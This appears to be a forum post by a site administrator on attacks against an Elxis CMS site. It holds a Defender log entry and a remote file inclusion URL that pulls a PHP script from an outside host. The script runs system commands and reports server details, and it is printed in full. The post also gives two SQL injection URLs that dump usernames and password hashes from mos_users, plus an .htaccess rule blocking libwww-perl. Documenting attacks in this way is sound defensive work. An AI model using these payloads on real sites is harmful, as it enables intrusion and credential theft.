Elxis Defender blocked an attack to your siteATTACKER IP ADDRESS: 82.197.222.145Requested URI: /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.europeytu.com/.httpaccess/roid.txt???DATE: 19-12-2008 01:05:10Attack was loggedSite turned offline for 120 seconds
http://www.europeytu.com/.httpaccess/roid.txt
<?echo "ALBANIA<br>";$alb = @php_uname();$alb2 = system(uptime);$alb3 = system(id);$alb4 = @getcwd();$alb5 = getenv("SERVER_SOFTWARE");$alb6 = phpversion();$alb7 = $_SERVER['SERVER_NAME'];$alb8 = gethostbyname($SERVER_ADDR);$alb9 = get_current_user();$os = @PHP_OS;echo "os: $os<br>";echo "uname -a: $alb<br>";echo "uptime: $alb2<br>";echo "id: $alb3<br>";echo "pwd: $alb4<br>";echo "user: $alb9<br>";echo "phpv: $alb6<br>";echo "SoftWare: $alb5<br>";echo "ServerName: $alb7<br>";echo "ServerAddr: $alb8<br>";echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";exit;?>
82.197.222.145 - - [19/Dec/2008:01:05:02 -0600] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.europeytu.com/.httpaccess/roid.txt??? HTTP/1.1" 200 208 "-" "libwww-perl/5.79"
19 Dec, 09:05:03 Ολλανδία 82.197.222.145 1 libWWW 5.79 libWWW 5.79
RewriteCond %{HTTP_USER_AGENT} libwww-perl.*RewriteRule .* - [F,L]
But, is it really the agent quilty for the attack?
//index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
/com_downloads//index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
Elxis become a famous cms.....IT IS THE FIRST TIME I SEE AN ELXIS COMPOMENT IN URLS AND NOT JOOMLA-MAMBO...